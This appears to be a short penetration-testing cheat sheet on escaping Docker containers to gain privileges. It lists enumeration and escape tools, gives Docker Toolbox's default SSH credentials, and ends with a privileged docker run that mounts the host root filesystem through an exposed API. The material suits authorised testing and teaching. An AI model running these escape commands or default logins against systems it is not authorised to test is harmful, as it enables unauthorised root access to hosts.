Skip to content

Linux Privilege Escalation - docker

Automatic Enumeration & Escape

  • linPEAS: It can also enumerate containers
  • cdk: This tool is pretty useful to enumerate the container you are into even try to escape automatically
  • amicontained: Useful tool to get the privileges the container has in order to find ways to escape from it
  • deepce: Tool to enumerate and escape from containers
  • grype: Get the CVEs contained in the software installed in the image

List Docker mounted volumes from within the container

mount | grep ^/dev/ | grep -v /etc | awk '{print $3}'

Docker-Toolbox

The solution is deprecated, but that doesn’t mean it can’t be seen in the wild. Docker Toolbox installs VirtualBox, and creates a VM running the boot2docker Linux distribution.

SSH into the VM using the username docker and the password tcuser. - User: docker - Pass: tcuser

ifocnfig
ssh docker@172.17.0.1
sudo -l

Other

docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine